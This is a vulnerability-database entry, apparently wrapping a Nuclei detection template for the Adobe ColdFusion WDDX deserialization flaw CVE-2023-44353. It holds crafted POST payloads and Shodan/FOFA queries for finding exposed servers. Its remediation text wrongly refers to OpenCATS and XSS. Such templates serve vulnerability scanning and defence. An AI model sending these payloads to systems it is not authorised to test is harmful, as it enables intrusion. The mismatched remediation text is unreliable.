9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.6 High
AI Score
Confidence
High
0.005 Low
EPSS
Percentile
77.6%
Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
id: CVE-2023-44353
info:
name: Adobe ColdFusion WDDX Deserialization Gadgets
author: salts
severity: critical
description: |
Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
remediation: |
To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-44353
- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
- https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py
- https://github.com/JC175/CVE-2023-44353-Nuclei-Template
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-44353
cwe-id: CWE-502
epss-score: 0.00412
epss-percentile: 0.73869
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: adobe
product: coldfusion
shodan-query:
- http.component:"Adobe ColdFusion"
- http.component:"adobe coldfusion"
- http.title:"coldfusion administrator login"
- cpe:"cpe:2.3:a:adobe:coldfusion"
fofa-query:
- title="coldfusion administrator login"
- app="adobe-coldfusion"
google-query: intitle:"coldfusion administrator login"
tags: cve2023,cve,adobe,coldfusion,deserialization,xss
variables:
windows_known_path: "C:\\Windows\\"
windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\"
linux_known_path: "/etc/"
linux_bad_path: "/thesecretcowlevelisreal/"
http:
- raw:
- |
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>
- |
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>
- |
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>
- |
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>
matchers-condition: or
matchers:
- type: dsl
name: windows
dsl:
- "status_code_1 == 500 && status_code_2 == 404"
- contains(body_1, "coldfusion.runtime")
condition: and
- type: dsl
name: linux
dsl:
- "status_code_3 == 500 && status_code_4 == 404"
- contains(body_3, "coldfusion.runtime")
condition: and
# digest: 490a00463044022016552548b902a20941bf3b8f74c6bb4168571b335e98fde72738a6b91f4bf39f02200c0098761471880e51ff1a9325790c071def7853d7c548302d5bb84f5178d7ff:922c64590222798bb761d5b6d8e72950
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.6 High
AI Score
Confidence
High
0.005 Low
EPSS
Percentile
77.6%